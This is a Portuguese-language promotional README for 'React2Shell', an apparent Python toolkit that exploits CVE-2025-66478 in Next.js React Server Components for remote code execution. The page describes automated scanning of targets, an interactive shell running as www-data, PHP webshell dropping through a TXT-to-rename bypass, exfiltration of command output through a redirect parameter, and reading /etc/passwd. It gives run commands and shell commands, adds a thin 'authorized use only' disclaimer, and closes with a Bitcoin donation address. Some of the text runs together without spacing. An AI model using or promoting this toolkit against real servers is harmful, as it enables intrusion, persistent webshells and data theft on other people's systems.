
React2Shell - Exploit de RCE para CVE-2025-66478
Este toolkit em Python explora a cadeia de gadgets de poluição de protótipo + React.lazy(-1) dos React Server Components (RSC) do Next.js para acesso RCE completo, incluindo god shell interativo, upload de arquivos (dropper de webshell PHP) e exfiltração via ?out=.

Detecção e exploração automatizadas de aplicações Next.js vulneráveis (ex.: target.com). Entrega um shell uid=33(www-data) com:
child_process.execSync → /exploit?out=UIDread /etc/passwd), uploads{\"0\":null} → 500 E{\"digest confirma o handler RSC.Location: /exploit?out=id_outputexecSync(cmd) → exfiltra stdout/stderr via redirecionamento.upload_txt local.txt remote.php → bypass de gravação+renomeação.pip3 install aiohttppython3 main.pyhttp://target.com ou targets.txt1=Detect 2=PoC(id) 3=Custom 4=God Shell [4]Via pipe: echo \"http://target\n4\" | python3 main.py
Comandos do God Shell:
upload <local.php> <remote/shell.php> # Direct PHP upload
upload_txt <local> <remote/shell.php> # TXT→rename bypass
upload_bin <local> <remote> # Binaries (chmod later)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[VULNERABLE] → uid=33(www-data)aiohttp
pip install aiohttp
Apenas para testes de penetração autorizados e fins educacionais (usuário confirmou permissão nos Termos de Serviço). Uso não autorizado é ilegal/antiético.
Compre-me um café:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans